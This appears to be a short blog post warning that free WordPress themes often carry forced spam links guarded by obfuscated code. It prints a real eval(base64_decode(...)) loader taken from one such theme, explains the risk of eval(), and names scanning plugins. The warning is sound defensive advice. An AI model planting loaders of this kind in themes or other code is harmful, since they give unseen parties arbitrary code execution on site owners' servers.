WordPress Advice of the Month: Why Free Themes are EVIL

Let’s start a new series on this blog. Today, Jan 31th is the B-day of the “WordPress Advice of the Month” series. Now some rules.

This sounds like it’s going to be a monthly series. But it’s not. Good WordPress advice is not that easy to find. I mean, there are loads of stuff out there, but not everything is really that interesting or valuable.

WordPress has been around for quite some time now. Many people are familiar with it. The level of so-called common knowledge is rather high. This results in a situation when 90% of new posts keep explaining the same ol’ stuff over and over again (just rehashing it slightly). New ideas are in the minority.

It’s somewhat similar to the situation in the “blogging about blogging” world. It seems like every day I see a post saying that the number one most important thing is to produce “good, valuable content”. Come on, if I had a nickel for every time someone wrote that… But it’s just a side note/rant.

Ok, let’s just get on with it

This month’s WordPress advice of the month touches upon the situation with free WordPress themes, and comes from the WPMU team. Here’s the post I’m talking about:

Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else

The biggest problem with free WordPress themes is that they are not really free.

If you’re using one you are paying with your link juice (I love that phrase – “link juice” – sounds delicious, anyway). Most of the free themes force you to link back to something. And most of the time it’s not even the website of the creators themselves. What you usually end up with is a bunch of links to places like dating sites, affiliate offers, even link farms. Not cool. But you can always remove the links by hand, right?

Wrong. In most cases you can’t because they are not placed in a manner you were taught by the programming gods. Theme creators are using encrypted code. It prevents you from removing it because if you try the theme just stops working.

Here’s an example of such a code:

<?php eval( base64_decode( ‘JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF
9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SP
WVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciL
CRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==’));?>

This particular code comes from one of the themes I’ve been using. The most important part of this fragment is the usage of eval() and base64_decode() PHP functions.

Let me tell you something about the eval() function. What it basically does is it evaluates a given string as PHP code. In plain English it means that it can be used to perform almost ANY operation on your web server! PHP is a easy to use yet very powerful programming language. You shouldn’t give anybody the power of performing eval() function on your server. Especially if you never met the guy, and all you know about him is that he created a nice looking WordPress theme.

What you can do

First of all, read the post by the WPMU team, you will find a much more complete explanation there. Then use three little plugins and check your theme for any malicious behavior. These plugins are:

• Theme Authenticity Checker
• Exploit Scanner
• Theme Check

Then come back and share your results here. Is your theme safe?